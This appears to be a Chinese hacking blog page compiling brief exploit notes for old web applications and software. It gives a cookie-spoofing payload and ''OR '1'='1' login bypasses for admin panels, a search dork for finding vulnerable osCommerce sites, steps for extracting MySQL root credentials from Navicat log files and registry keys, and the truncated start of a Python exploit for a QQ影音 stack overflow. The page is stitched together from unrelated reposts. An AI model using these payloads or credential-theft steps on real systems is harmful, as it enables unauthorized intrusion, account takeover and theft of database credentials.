凌风[0x0F]'s BloG

[!]作者 :seraph
[!]QQ :81413170
[!]程序名称 ;动易
[!]包含版本 :6.6,6.7
[!]漏洞文件 :payonline/autorecive1.asp
[!]漏洞描述 :参数未过滤，可产生注入漏洞
[!]危害程度 :低
[!]首发日期 :2010-8-12
************************************************************************
...

http://hi.baidu.com/hnaker/blog/item/3ff5633d46918ff7828b1387.html

navicat是一个比较流行的MySQL管理工具，在很多服务器上都可以找到

有两个方法提权：

1、从日志文件里找密码，navicat会把操作日志（比如加账户）保存到My Documents\Navicat\MySQL\logs下的LogHistory.txt，低版本是安装目录下的logs下LogHistory.txt

2、navicat管理的MySQL服务器信息（一般是root帐户）是存在注册表里的，具体是HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers下，导出注册表导入到本机然后星号察看就OK了。。
...

COOKIES欺骗，下面的是COOKIES利用代码：

Sy%5FShops=TFlags=1%2C2%2C3%2C4%2C5%2C11%2C12%_2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C21%2C22%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C41%2C42%2C43%_2C44%2C51%2C52%2C53%2C54%2C55%2C56%2C61%2C62%2C63%2C64&AdminoldFlags=1&Truename=%CE%_DE&AdminFlags=1&AdminPassword='or'='or'&AdminName='or'='or';

转自xhming

这个系统是国内非常流行的视频点播系统，之前的1.5版本漏洞非常多，2.0版本在安全方面有所提高，但是依然有漏洞存在。

EZ-Oscommerce 3.1程序针对其上传进行严格验证和过滤，可以上传任意恶意代码。google :Powered by osCommerce 或者Customized by EZ-Oscommerce

rapidCMS V2 后台登录认证未经过严格过滤，导致万能密码绕过漏洞。

利用方法：

User:xxoo
Pass: ' OR '1'='1

Demo : http://site/admin.php

QQ影音是腾讯公司推出的一款支持任何格式影片和音乐文件的本地播放器。用户受骗使用QQ影音打开了特制的ASX或CUE文件就可以触发栈溢出，导致执行任意代码。

测试代码：

#!/usr/bin/env python#################################################################...